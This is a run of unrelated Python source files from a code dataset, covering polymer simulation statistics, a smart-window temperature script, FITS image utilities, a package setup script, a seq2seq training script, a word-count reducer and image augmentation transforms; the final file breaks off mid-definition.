lines += '\\n\\n=====================\\nTotal Rg average is: {0:2.3f} +/- {1:2.5f}'.format(RgAvg,RgErr)\n lines += '\\nTotal Rg avg. correlation time: {0:5.4f} +/- {1:5.6f}'.format(RgCorrTime, RgCorrTimeErr)\n lines += '\\n\\nTotal Ree average is: {0:2.3f} +/- {1:2.5f}'.format(ReeAvg,ReeErr)\n lines += '\\nTotal Ree avg. correlation time: {0:5.4f} +/- {1:5.6f}'.format(ReeCorrTime, ReeCorrTimeErr)\n\n print(lines)\n txtRg += lines\n f = open(RgStatOutName+Ext,'w')\n f.write(txtRg)\n return RgAvg,RgStd,RgErr,RgCorrTime,RgCorrTimeErr,RgNUncorrSamples, ReeAvg,ReeStd,ReeErr,ReeCorrTime,ReeCorrTimeErr,ReeNUncorrSamples \n\ndef GetStats(trajFile, top, NP, ThermoLog, DOP = 10, NAtomsPerChain = None, \n StatsFName = 'AllStats.dat', RgDatName = 'RgTimeSeries', ReeDatName = 'ReeTimeSeries',RgStatOutName = 'RgReeStats', Ext='.dat', \n fi = 'lammps', obs = None, cols = None,\n res0Id = 0, stride = 1, autowarmup = True, warmup = 100, plot = False, unit = 'real'):\n \n txt = '# Avg.\\tS.D.\\tStdErr.\\tCorr.\\tStdErr.\\tUncorr.Samples\\n'\n if NP > 0:\n RgAvg,RgStd,RgErr,RgCorrTime,RgCorrTimeErr,RgNUncorrSamples, ReeAvg,ReeStd,ReeErr,ReeCorrTime,ReeCorrTimeErr,ReeNUncorrSamples = GetRgRee(trajFile, top, DOP, NP, NAtomsPerChain = NAtomsPerChain,\n RgDatName = RgDatName, ReeDatName = ReeDatName, RgStatOutName = RgStatOutName, Ext=Ext,\n res0Id = res0Id, stride = stride, autowarmup = autowarmup, warmup = warmup, plot = plot, fi = fi, unit = unit)\n txt += ' Rg\\t%8.5f\\t%8.5f\\t%8.5f\\t%8.5f\\t%8.5f\\t%i' %(RgAvg,RgStd,RgErr,RgCorrTime,RgCorrTimeErr,RgNUncorrSamples)\n txt += '\\n Ree\\t%8.5f\\t%8.5f\\t%8.5f\\t%8.5f\\t%8.5f\\t%i' %(ReeAvg,ReeStd,ReeErr,ReeCorrTime,ReeCorrTimeErr,ReeNUncorrSamples)\n\n print('reading thermo file {}'.format(ThermoLog))\n obsID, Stats = GetThermo(ThermoLog, fi = fi, obs = obs, cols = cols, autowarmup = autowarmup, warmup = warmup)\n \n for i, obs in enumerate(obsID):\n Avg,Std,CorrTime,Err,NUncorrSamples = Stats[i]\n try:\n txt += '\\n %s\\t%8.5f\\t%8.5f\\t%8.5f\\t%8.5f\\t%s\\t%i' %(obs, Avg, Std, Err, CorrTime, 'N/A',NUncorrSamples)\n except:\n txt += '\\n %s\\t%8.5f\\t%8.5f\\t%8.5f\\t%8.5f\\t%s\\t%s' %(obs, Avg, Std, Err, CorrTime, 'N/A',NUncorrSamples)\n f = 
open(StatsFName, 'w')\n f.write(txt)\n\ndef GetCompressibility(trajFile, top, temp, stride = 1, unit = 'bar', lengthScale = 0.31, fName = 'Compressibility', Ext='.dat', trajFmt = 'omm'):\n \"\"\"unit = ['bar','Pa','nonDim']\n lengthScale in nm\n trajFmt: lmp or omm, multiply volume by 10**3 if trajFmt is lmp and unit is nonDim\"\"\"\n\n print('Need temperature in Kelvin')\n kT = kB * temp #kJ/mol \n traj = md.load(trajFile, top=top, stride = stride)\n vols = traj.unitcell_volumes\n if trajFmt == 'lmp' and unit =='nonDim':\n vols *= 10.**3\n meanVol = np.mean(vols)\n vol2s = vols**2\n meanVol2 = np.mean(vol2s)\n if unit == 'Pa':\n compressibility = (meanVol2 - meanVol**2)/(meanVol*kT) * N_av * 1e-30\n s = '1/'+unit\n print('Compressibility is {:.4e} {:s}'.format(compressibility, s))\n elif unit == 'bar':\n compressibility = (meanVol2 - meanVol**2)/(meanVol*kT) * N_av * 1e-25\n s = '1/'+unit\n print('Compressibility is {:.4e} {:s}'.format(compressibility, s)) \n elif unit == 'nonDim':\n kT = 1.\n print('Assume kT = 1.')\n compressibility = (meanVol2 - meanVol**2)/(meanVol*kT) * N_av\n compressibilityBar = compressibility * lengthScale**3 / (kB * temp) * 1e-25\n s = 'sigma^3/kT'\n print('Compressibility is {:.4e} {:s}'.format(compressibility, s))\n print('Convert to real unit at {:.2f} K for length scale of {:.2f} nm: {:.4e} 1/bar'.format(temp, lengthScale, compressibilityBar))\n f = open(fName+Ext,'w')\n f.write('{:.5e} {:s}'.format(compressibility, s))\n return compressibility\n\nif __name__ == '__main__':\n\n TrajFile = 'PAA0_traj.dcd'\n ThermoLog = 'PAA0_lammps.log'\n NAtomsPerChain = 12\n NP = 6\n top = 'PAA0.pdb' \n DOP = 12\n GetStats(TrajFile, top, NP, ThermoLog, DOP = 12, NAtomsPerChain = NAtomsPerChain, StatsFName = 'AllStats.dat',\n RgDatName = 'RgTimeSeries', ReeDatName = 'ReeTimeSeries',RgStatOutName = 'RgReeStats', Ext='.dat',\n fi = 'lammps', obs = ['PotEng', 'Temp', 'Press'], cols = None,\n res0Id = 0, stride = 1, autowarmup = True, warmup = 100, plot = True)\n","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":15717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"430690083","text":"\"\"\"\nFile: simple-algorithm-test-module.py\nCourse: Senior Design Project - CSE 181B / EECS 159B\nAuthors: Michael Ishimoto\n Tyler Hom\n Ji Yeon Kim\n David Tran\n\"\"\"\n\nimport subprocess\nimport json\nimport urllib2\nimport time\n\ndesiredTemp = 70.0; # This is in Fahrenheit\n # All temperature values will be in Fahrenheit\n\n# Main method of the program which will run first when file is executed\ndef main():\n # Setting the next hour\n nextHour = getNextHour();\n\n # Infinite loop to constantly check temperatures\n while True:\n if str(time.localtime().tm_hour) == str(nextHour):\n nextHour = getNextHour();\n simpleAlgorithm();\n\n# Method for retrieving an EnOcean's sensor state / value\n# Returns the state as a string if the specified sensor is found, returns false otherwise\ndef retrieveEnOceanState(sensor):\n # Obtaining EnOcean sensor values\n output = subprocess.Popen(['/opt/fhem/fhem.pl', 'localhost:7072', 'jsonList'], stdout=subprocess.PIPE).communicate()[0]\n data = json.loads(output);\n devices = data['Results'][3]['devices']\n for device in devices:\n if device['DEF'] == '018B79C1' and sensor == 'EDWS': # Door sensor\n return device['STATE'] ;\n if device['DEF'] == '01831695' and sensor == 'STM': # Temperature sensor\n return device['STATE'];\n\n return False;\n\n# Method for getting the 
current temperature in the specified state and city\n# Returns the current fahrenheit temperature as a float\ndef getCurrentTemperature(state, city):\n # Making an API call to weatherunderground\n f = urllib2.urlopen('http://api.wunderground.com/api/12d1b60c95f74d26/geolookup/conditions/q/' + state + '/' + city + '.json');\n\n # Parsing the returned JSON\n json_string = f.read();\n parsed_json = json.loads(json_string);\n location = parsed_json['location']['city'];\n temp_f = parsed_json['current_observation']['temp_f'];\n # print \"Current temperature in %s is: %s\" % (location, temp_f)\n f.close()\n\n return temp_f;\n\n# Method for getting the next hour from the current hours\n# Returns the next hour as an integer\ndef getNextHour():\n currentHour = time.localtime().tm_hour;\n\n if (currentHour == 23):\n return 0;\n\n return currentHour + 1;\n\n# Method for checking the temperatures and taking actions based on Results\ndef simpleAlgorithm():\n insideTemp = float(retrieveEnOceanState('STM')) * 1.8 + 32;\n outsideTemp = getCurrentTemperature('CA', 'Irvine');\n\n # print(type(insideTemp));\n # print(type(outsideTemp));\n # print(type(desiredTemp));\n\n print('Inside temp: ' + str(insideTemp));\n print('Outside temp: ' + str(outsideTemp));\n print('Desired temp: ' + str(desiredTemp));\n\n if insideTemp > desiredTemp:\n if outsideTemp < insideTemp:\n print('Opening window...');\n else:\n print('Closing window');\n elif insideTemp < desiredTemp:\n if outsideTemp > insideTemp:\n print('Opening window...');\n else:\n print('Closing window');\n\nmain(); # Call to main method so that it runs first\n","sub_path":"src/test/simple-algorithm-test-module.py","file_name":"simple-algorithm-test-module.py","file_ext":"py","file_size_in_byte":3142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"456765289","text":"import numpy as np\nfrom tqdm import tqdm\ntry:\n from astropy.io import fits as pf\nexcept:\n import pyfits as pf\nimport matplotlib.pyplot as plt\nfrom astropy.visualization import ZScaleInterval\nimport pandas as pd\n\n#suppose these come form config file\nfilters_in_config = 'g,r,z_s'.split(',')\nbands = {}\ndef get_band_list(file_list):\n for j in filters_in_config:\n #initialize dict with empty arrays\n j=j.strip(' ')\n bands[j]=[]\n filters_in_hdr=[]\n\n for i in tqdm(file_list):\n hdr = pf.getheader(i)\n filters_in_hdr.append(hdr['FILTER'])\n for j in filters_in_config:\n if hdr['FILTER'] == j:\n j=j.strip(' ')\n bands[j].append(i)\n\n for key in sorted(bands.keys()):\n print('{0}-band: {1} frames'.format(key, len(bands[key])))\n return bands\n\n\ndef stack_raw_images(image_list, skip_every=1):\n '''\n stack image using median to be used for detecting \n source locations (i.e. 
target and ref stars)\n '''\n image_array = []\n count = []\n for i in tqdm(image_list[::skip_every]):\n img = pf.getdata(i)\n image_array.append(img)\n count.append(i)\n stacked_image = np.median(image_array, axis=0)\n print('number of stacked raw images={}'.format(len(count)))\n return stacked_image\n\ndef show_stacked_images(images):\n fig, axes = plt.subplots(1,3,figsize=(15,5))\n titles='g,r,z'.split(',')\n for i,img in enumerate(images):\n vmin,vmax= ZScaleInterval().get_limits(img)\n axes[i].imshow(img,vmin=vmin,vmax=vmax)\n axes[i].set_title(titles[i])\n plt.show()\n #return None\n\ndef get_crop(image, centroid, box_size):\n x, y = centroid\n image_crop = np.copy(image[int(y-(box_size/2)):int(y+(box_size/2)),int(x-(box_size/2)):int(x+(box_size/2))])\n return image_crop\n\ndef fwhm_to_sigma(fwhm):\n return fwhm/ (2*np.sqrt(2*np.log(2)))\n\ndef sigma_to_fwhm(sigma):\n return sigma * (2*np.sqrt(2*np.log(2)))\n\ndef parse_tables(tables, star_id):\n parsed={}\n colnames=tables[star_id][0].columns #at time=0 \n\n for i in colnames:\n parsed[i]=[]\n for t in range(len(tables[star_id])): #t is time\n parsed[i].append(float(tables[star_id][t][i]))\n \n df=pd.DataFrame(parsed)\n df=df.set_index('mjd')\n return df\n\ndef save_tables(df, band_idx, star_id):\n band=['g','r','z_s']\n fname='data/phot_{0}band_star{1}.csv'.format(band[band_idx],star_id)\n df.to_csv(fname)\n print('saved:\\n{}'.format(fname))\n\ndef parse_and_save_tables(tables, band_idx):\n dfs=[] #list of df per star\n for num in range(len(tables)):\n df = parse_tables(tables, num)\n dfs.append(df)\n save_tables(df, band_idx, num)\n return dfs\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"notebook/moscatel/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"452320771","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\n\nfrom setuptools import find_packages, setup\nfrom setuptools.command.test import test as TestCommand\n\n\ndef get_long_description():\n \"\"\"\n Read long description in a way that doesn't break if README.rst doesn't exist (for example in the docker image)\n \"\"\"\n try:\n description = open('README.rst').read()\n except FileNotFoundError:\n description = ''\n return description\n\n\ndef get_install_requirements(path):\n location = os.path.dirname(os.path.realpath(__file__))\n content = open(os.path.join(location, path)).read()\n requires = [req for req in content.split('\\\\n') if req != '']\n return requires\n\n\nclass PyTest(TestCommand):\n def initialize_options(self):\n TestCommand.initialize_options(self)\n self.cov = None\n self.pytest_args = ['--cov', 'lizzy',\n '--cov-report', 'term-missing',\n '--cov-report', 'xml',\n '-v']\n\n def finalize_options(self):\n TestCommand.finalize_options(self)\n self.test_args = []\n self.test_suite = True\n\n def run_tests(self):\n import pytest\n errno = pytest.main(self.pytest_args)\n sys.exit(errno)\n\nVERSION = '2017.0.dev1'\n\nsetup(\n name='lizzy',\n packages=find_packages(),\n version=VERSION,\n description='REST Service to deploy AWS CF templates using Senza',\n long_description=get_long_description(),\n author='Zalando SE',\n url='https://github.com/zalando/lizzy',\n license='Apache License Version 2.0',\n install_requires=get_install_requirements('requirements.txt'),\n tests_require=['pytest-cov', 'pytest', 'factory_boy'],\n cmdclass={'test': PyTest},\n classifiers=[\n 'Programming Language :: 
Python',\n 'Programming Language :: Python :: 3',\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'Operating System :: OS Independent',\n ],\n include_package_data=True,\n package_data={'lizzy': ['swagger/*']}, # include swagger specs\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"235449494","text":"#!/usr/bin/env python3\n\nprefix = (\"DEBUG\", \"WARNING\", \"ERROR\", \"MESSAGE\")\n\ndef ShowChars(num, token):\n return \"\\t\" + (token * (num + 4))\n \ndef Show(ss, message):\n if(ss < 1):\n ss = 1\n if(ss > 4):\n ss = 4\n message = prefix[ss - 1] + \": \" + message\n xx = len(message)\n stars = ShowChars(xx, '*')\n print(stars)\n print(\"\\t* \" + message + \" *\")\n print(stars)\n\nShow(4, \"This is a MESSAGE\")\nShow(1, \"Doh!\")\n\n","sub_path":"Python1100/Study/MyBannerArray.py","file_name":"MyBannerArray.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"565386201","text":"import os\nimport argparse\nimport json\n\nimport dataio\nfrom model_builder import Seq2SeqRNNBuilder\nimport criterion\nimport trainer\n\nimport random\nimport torch\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\"Train seq2seq.\")\n\n parser.add_argument(\n \"--train\", required=True)\n parser.add_argument(\n \"--valid\", required=True)\n\n parser.add_argument(\n \"--rnn-type\", required=False, type=str, default=\"gru\",\n choices=[\"rnn\", \"gru\", \"lstm\"])\n parser.add_argument(\n \"--num-layers\", default=1, type=int, required=False)\n parser.add_argument(\n \"--bidirectional\", default=1, type=int, choices=[0,1])\n parser.add_argument(\n \"--embedding-size\", required=False, type=int, default=300)\n parser.add_argument(\n \"--hidden-size\", required=False, type=int, default=300)\n parser.add_argument(\n \"--bridge-type\", required=False, type=str, default=\"linear-relu\",\n choices=[\"average\", \"linear-relu\"])\n parser.add_argument(\n \"--attention-type\", required=False, choices=[\"none\", \"dot\",],\n default=\"dot\")\n\n parser.add_argument(\n \"--gpu\", default=-1, type=int, required=False)\n parser.add_argument(\n \"--epochs\", default=25, type=int, required=False)\n parser.add_argument(\n \"--seed\", default=83419234, type=int, required=False)\n\n parser.add_argument(\n \"--optimizer\", default=\"adagrad\", type=str, required=False,\n choices=[\"sgd\", \"adagrad\", \"adadelta\", \"adam\"])\n parser.add_argument(\n \"--lr\", required=False, default=.001, type=float)\n parser.add_argument(\n \"--batch-size\", default=16, type=int, required=False)\n parser.add_argument(\n \"--dropout\", default=0.0, required=False, type=float)\n\n parser.add_argument(\n \"--src-tgt-fields\", required=False, default=(0, 1,), type=int,\n nargs=2)\n parser.add_argument(\n \"--enc-vocab-size\", default=40000, type=int, required=False)\n parser.add_argument(\n \"--dec-vocab-size\", default=40000, type=int, required=False)\n parser.add_argument(\n \"--max-steps\", default=50, type=int, required=False)\n parser.add_argument(\n \"--step-embedding-size\", default=100, type=int, required=False)\n\n parser.add_argument(\n \"--save-model\", default=None, required=False, type=str)\n parser.add_argument(\n \"--save-results\", default=None, required=False, type=str)\n\n args = parser.parse_args()\n\n random.seed(args.seed)\n 
torch.manual_seed(args.seed)\n\n\n field_src, field_tgt = args.src_tgt_fields\n vocab_args_src = {\"special_tokens\": [], \n \"unknown_token\": \"_UNK_\",\n \"top_k\": args.enc_vocab_size}\n vocab_args_tgt = {\"special_tokens\": [\"_START_\", \"_STOP_\"], \n \"unknown_token\": \"_UNK_\", \n \"top_k\": args.dec_vocab_size}\n\n vocab_src, vocab_tgt = dataio.read_vocabs_from_tsv(\n args.train,\n [field_src, field_tgt],\n vocab_args=[vocab_args_src, vocab_args_tgt])\n\n data_train = dataio.read_seq2seq_ts_dataset(\n args.train, field_src, vocab_src, field_tgt, vocab_tgt,\n max_steps=args.max_steps, skip_header=True,\n batch_size=args.batch_size, gpu=args.gpu)\n data_valid = dataio.read_seq2seq_ts_dataset(\n args.valid, field_src, vocab_src, field_tgt, vocab_tgt,\n max_steps=args.max_steps, skip_header=True,\n batch_size=args.batch_size, gpu=args.gpu)\n\n builder = Seq2SeqRNNBuilder()\n builder.add_encoder(\n vocab_src.size, args.embedding_size, args.rnn_type, args.hidden_size,\n args.num_layers, args.bidirectional == 1)\n builder.add_decoder(\n [vocab_tgt.size, args.max_steps], \n [args.embedding_size, args.step_embedding_size],\n args.rnn_type, args.hidden_size, args.num_layers, \n vocab_tgt.size,\n vocab_tgt.index(\"_START_\"),\n vocab_tgt.index(\"_STOP_\"),\n args.attention_type)\n builder.add_bridge(\n args.bridge_type, args.bidirectional == 1, args.hidden_size,\n args.num_layers)\n model = builder.finish_rnn_ts()\n\n model.set_meta(\"model_type\", \"seq2seq_rnn_ts\")\n model.set_meta(\"encoder_vocab\", vocab_src)\n model.set_meta(\"decoder_vocab\", vocab_tgt)\n model.set_meta(\"max_steps\", args.max_steps)\n \n #import types\n\n if args.gpu > -1:\n with torch.cuda.device(args.gpu):\n torch.cuda.manual_seed(args.seed)\n model = model.cuda(args.gpu)\n\n if args.optimizer == \"sgd\":\n optimizer = torch.optim.SGD(model.parameters(), lr=args.lr)\n elif args.optimizer == \"adagrad\":\n optimizer = torch.optim.Adagrad(model.parameters(), lr=args.lr)\n elif args.optimizer == \"adadelta\":\n optimizer = torch.optim.Adadelta(model.parameters(), lr=args.lr)\n elif args.optimizer == \"adam\":\n optimizer = torch.optim.Adam(model.parameters(), lr=args.lr)\n else:\n raise Exception(\"Unkown optimizer: {}\".format(args.optimizer))\n\n if args.save_model is not None:\n d = os.path.dirname(args.save_model)\n if d != \"\" and not os.path.exists(d):\n os.makedirs(d)\n\n crit = criterion.SequenceCrossEntropy(model, optimizer)\n results = trainer.minimize_criterion(\n crit, data_train, data_valid, args.epochs,\n save_best_model=args.save_model)\n\n best_valid_loss = min(results[\"valid_nll\"])\n best_epoch = results[\"valid_nll\"].index(best_valid_loss) + 1\n print(\"\\nBest epoch: {}\".format(best_epoch))\n print(\"Best validation nll: {}\".format(best_valid_loss))\n\n if args.save_results is not None:\n d = os.path.dirname(args.save_results)\n if d != \"\" and not os.path.exists(d):\n os.makedirs(d)\n\n print(\"Writing results json to {} ...\".format(args.save_results))\n results[\"parameters\"] = vars(args)\n with open(args.save_results, \"w\") as fp:\n json.dump(results, fp)\n","sub_path":"python_main_experimental/seq2seq_ts_trainer_main.py","file_name":"seq2seq_ts_trainer_main.py","file_ext":"py","file_size_in_byte":5931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"180759612","text":"#!/usr/bin/env python3\n\nfrom operator import itemgetter\nimport sys\n\ncurrent_word = None\ncurrent_count = 0\nword = None\nreduce_final=[]\ncount=0\nj=0\n\nfor 
 line in sys.stdin:\n\tline = line.strip()\n\tword, count = line.split('\t', 1)\n\tcount = int(count)\n \n\n\tif current_word == word:\n\t\tcurrent_count += count\n\telse:\n\t\tif current_word:\n\t\t\treduce_final.append({\"word\":current_word,\"count\":current_count}) \n\t \n\t\tcurrent_count = count\n\t\tcurrent_word = word\n\nif current_word == word:\n\treduce_final.append({\"word\":current_word,\"count\":current_count})\n\treduce_final= sorted(reduce_final, key=itemgetter('count'),reverse=True) \n\tfor i in reduce_final:\n\t\tif(j<10):\n\t\t\tprint('{0}\t{1}'.format(i[\"word\"], i[\"count\"]))\n\t\t\tj+=1\n","sub_path":"Part-2 N-grams/Code/reducer.py","file_name":"reducer.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"486733668","text":"cantidad = 0\nsuma = 0\nwhile True:\n cantidad += 1\n n = int(input('Dime un número:'))\n suma = suma + n\n if n == 0:\n break\nprint('El número de números introducidos es' +' '+ str(cantidad-1))\nprint('La suma de los números introducidos son'+' '+str(suma))","sub_path":"P5 Longitud de una secuencia.py","file_name":"P5 Longitud de una secuencia.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"106721931","text":"from django import forms\nfrom .models import Posts\n\n\nclass PostForm(forms.ModelForm):\n class Meta:\n model = Posts\n fields = [\n \"title\",\n \"content\",\n ]\n\n # def clean_title(self):\n # title = self.cleaned_data.get(\"title\")\n # query = Posts.objects.filter(title__iexact=title)\n # if query.exists():\n # raise forms.ValidationError(\"Please select a new Title. This one is already used.\")\n\n","sub_path":"poss/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"453361582","text":"import heapq\nclass Solution:\n def pancakeSort(self, arr):\n used = sorted(arr)\n k = []\n while arr != sorted(arr):\n if len(used) > 0:\n i = used.pop()\n print(arr)\n j = arr.index(i)\n arr[0:j+1] = reversed(arr[0:j+1])\n k.append(j)\n else:\n used = arr\n return k, arr\n\n\narr = [4,1,3,2,4]\ng = Solution()\nprint(g.pancakeSort(arr))","sub_path":"dynamic_programming/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"214582502","text":"import numpy as np\nimport scipy\nimport scipy.ndimage\nfrom scipy.ndimage.filters import gaussian_filter\nfrom scipy.ndimage.interpolation import map_coordinates\nimport collections\nfrom PIL import Image\nimport numbers\nfrom typing import Optional, Tuple, Union\nfrom torch.nn.functional import pad\nfrom torchio.transforms import RandomAffine, RandomFlip, RandomNoise, RandomElasticDeformation\n\ndef center_crop(x, center_crop_size):\n assert x.ndim == 3\n centerw, centerh = x.shape[1] // 2, x.shape[2] // 2\n halfw, halfh = center_crop_size[0] // 2, center_crop_size[1] // 2\n return x[:, centerw - halfw:centerw + halfw, centerh - halfh:centerh + halfh]\n\n\ndef to_tensor(x):\n import torch\n x = x.transpose((2, 0, 1))\n print(x.shape)\n return torch.from_numpy(x).float()\n\n\ndef random_num_generator(config, random_state=np.random):\n if config[0] == 'uniform':\n ret = random_state.uniform(config[1], config[2], 1)[0]\n elif config[0] == 'lognormal':\n ret = 
random_state.lognormal(config[1], config[2], 1)[0]\n else:\n print(config)\n raise Exception('unsupported format')\n return ret\n\n\ndef poisson_downsampling(image, peak, random_state=np.random):\n if not isinstance(image, np.ndarray):\n imgArr = np.array(image, dtype='float32')\n else:\n imgArr = image.astype('float32')\n Q = imgArr.max(axis=(0, 1)) / peak\n if Q[0] == 0:\n return imgArr\n ima_lambda = imgArr / Q\n noisy_img = random_state.poisson(lam=ima_lambda)\n return noisy_img.astype('float32')\n\n\ndef elastic_transform(image, alpha=100, sigma=30, spline_order=1, mode='nearest', random_state=np.random):\n \"\"\"Elastic deformation of image as described in [Simard2003]_.\n .. [Simard2003] Simard, Steinkraus and Platt, \"Best Practices for\n Convolutional Neural Networks applied to Visual Document Analysis\", in\n Proc. of the International Conference on Document Analysis and\n Recognition, 2003.\n \"\"\"\n assert image.ndim == 3\n shape = image.shape[:2]\n\n dx = gaussian_filter((random_state.rand(*shape) * 2 - 1),\n sigma, mode=\"constant\", cval=0) * alpha\n dy = gaussian_filter((random_state.rand(*shape) * 2 - 1),\n sigma, mode=\"constant\", cval=0) * alpha\n\n x, y = np.meshgrid(np.arange(shape[0]), np.arange(shape[1]), indexing='ij')\n indices = [np.reshape(x + dx, (-1, 1)), np.reshape(y + dy, (-1, 1))]\n result = np.empty_like(image)\n for i in range(image.shape[2]):\n result[:, :, i] = map_coordinates(\n image[:, :, i], indices, order=spline_order, mode=mode).reshape(shape)\n return result\n\n\nclass Merge(object):\n \"\"\"Merge a group of images\n \"\"\"\n\n def __init__(self, axis=-1):\n self.axis = axis\n\n def __call__(self, images):\n if isinstance(images, collections.Sequence) or isinstance(images, np.ndarray):\n assert all([isinstance(i, np.ndarray)\n for i in images]), 'only numpy array is supported'\n shapes = [list(i.shape) for i in images]\n for s in shapes:\n s[self.axis] = None\n assert all([s == shapes[0] for s in shapes]\n ), 'shapes must be the same except the merge axis'\n return np.concatenate(images, axis=self.axis)\n else:\n raise Exception(\"obj is not a sequence (list, tuple, etc)\")\n\n\nclass Split(object):\n \"\"\"Split images into individual arraies\n \"\"\"\n\n def __init__(self, *slices, **kwargs):\n assert isinstance(slices, collections.Sequence)\n slices_ = []\n for s in slices:\n if isinstance(s, collections.Sequence):\n slices_.append(slice(*s))\n else:\n slices_.append(s)\n assert all([isinstance(s, slice) for s in slices_]\n ), 'slices must be consist of slice instances'\n self.slices = slices_\n self.axis = kwargs.get('axis', -1)\n\n def __call__(self, image):\n if isinstance(image, np.ndarray):\n ret = []\n for s in self.slices:\n sl = [slice(None)] * image.ndim\n sl[self.axis] = s\n ret.append(image[sl])\n return ret\n else:\n raise Exception(\"obj is not an numpy array\")\n\n\nclass ElasticTransform(object):\n \"\"\"Apply elastic transformation on a numpy.ndarray (H x W x C)\n \"\"\"\n\n def __init__(self, alpha, sigma):\n self.alpha = alpha\n self.sigma = sigma\n\n def __call__(self, image):\n if isinstance(self.alpha, collections.Sequence):\n alpha = random_num_generator(self.alpha)\n else:\n alpha = self.alpha\n if isinstance(self.sigma, collections.Sequence):\n sigma = random_num_generator(self.sigma)\n else:\n sigma = self.sigma\n return elastic_transform(image, alpha=alpha, sigma=sigma)\n\n\nclass PoissonSubsampling(object):\n \"\"\"Poisson subsampling on a numpy.ndarray (H x W x C)\n \"\"\"\n\n def __init__(self, peak, 
random_state=np.random):\n self.peak = peak\n self.random_state = random_state\n\n def __call__(self, image):\n if isinstance(self.peak, collections.Sequence):\n peak = random_num_generator(\n self.peak, random_state=self.random_state)\n else:\n peak = self.peak\n return poisson_downsampling(image, peak, random_state=self.random_state)\n\n\nclass AddGaussianNoise(object):\n \"\"\"Add gaussian noise to a numpy.ndarray (H x W x C)\n \"\"\"\n\n def __init__(self, mean, sigma, random_state=np.random):\n self.sigma = sigma\n self.mean = mean\n self.random_state = random_state\n\n def __call__(self, image):\n if isinstance(self.sigma, collections.Sequence):\n sigma = random_num_generator(self.sigma, random_state=self.random_state)\n else:\n sigma = self.sigma\n if isinstance(self.mean, collections.Sequence):\n mean = random_num_generator(self.mean, random_state=self.random_state)\n else:\n mean = self.mean\n row, col, ch = image.shape\n gauss = self.random_state.normal(mean, sigma, (row, col, ch))\n gauss = gauss.reshape(row, col, ch)\n image += gauss\n return image\n\n\nclass AddSpeckleNoise(object):\n \"\"\"Add speckle noise to a numpy.ndarray (H x W x C)\n \"\"\"\n\n def __init__(self, mean, sigma, random_state=np.random):\n self.sigma = sigma\n self.mean = mean\n self.random_state = random_state\n\n def __call__(self, image):\n if isinstance(self.sigma, collections.Sequence):\n sigma = random_num_generator(\n self.sigma, random_state=self.random_state)\n else:\n sigma = self.sigma\n if isinstance(self.mean, collections.Sequence):\n mean = random_num_generator(\n self.mean, random_state=self.random_state)\n else:\n mean = self.mean\n row, col, ch = image.shape\n gauss = self.random_state.normal(mean, sigma, (row, col, ch))\n gauss = gauss.reshape(row, col, ch)\n image += image * gauss\n return image\n\n\nclass GaussianBlurring(object):\n \"\"\"Apply gaussian blur to a numpy.ndarray (H x W x C)\n \"\"\"\n\n def __init__(self, sigma, random_state=np.random):\n self.sigma = sigma\n self.random_state = random_state\n\n def __call__(self, image):\n if isinstance(self.sigma, collections.Sequence):\n sigma = random_num_generator(\n self.sigma, random_state=self.random_state)\n else:\n sigma = self.sigma\n image = gaussian_filter(image, sigma=(sigma, sigma, 0))\n return image\n\n\nclass AddGaussianPoissonNoise(object):\n \"\"\"Add poisson noise with gaussian blurred image to a numpy.ndarray (H x W x C)\n \"\"\"\n\n def __init__(self, sigma, peak, random_state=np.random):\n self.sigma = sigma\n self.peak = peak\n self.random_state = random_state\n\n def __call__(self, image):\n if isinstance(self.sigma, collections.Sequence):\n sigma = random_num_generator(\n self.sigma, random_state=self.random_state)\n else:\n sigma = self.sigma\n if isinstance(self.peak, collections.Sequence):\n peak = random_num_generator(\n self.peak, random_state=self.random_state)\n else:\n peak = self.peak\n bg = gaussian_filter(image, sigma=(sigma, sigma, 0))\n bg = poisson_downsampling(\n bg, peak=peak, random_state=self.random_state)\n return image + bg\n\n\nclass MaxScaleNumpy(object):\n \"\"\"scale with max and min of each channel of the numpy array i.e.\n channel = (channel - mean) / std\n \"\"\"\n\n def __init__(self, range_min=0.0, range_max=1.0):\n self.scale = (range_min, range_max)\n\n def __call__(self, image):\n mn = image.min(axis=(0, 1))\n mx = image.max(axis=(0, 1))\n return self.scale[0] + (image - mn) * (self.scale[1] - self.scale[0]) / (mx - mn)\n\n\nclass MedianScaleNumpy(object):\n \"\"\"Scale with median 
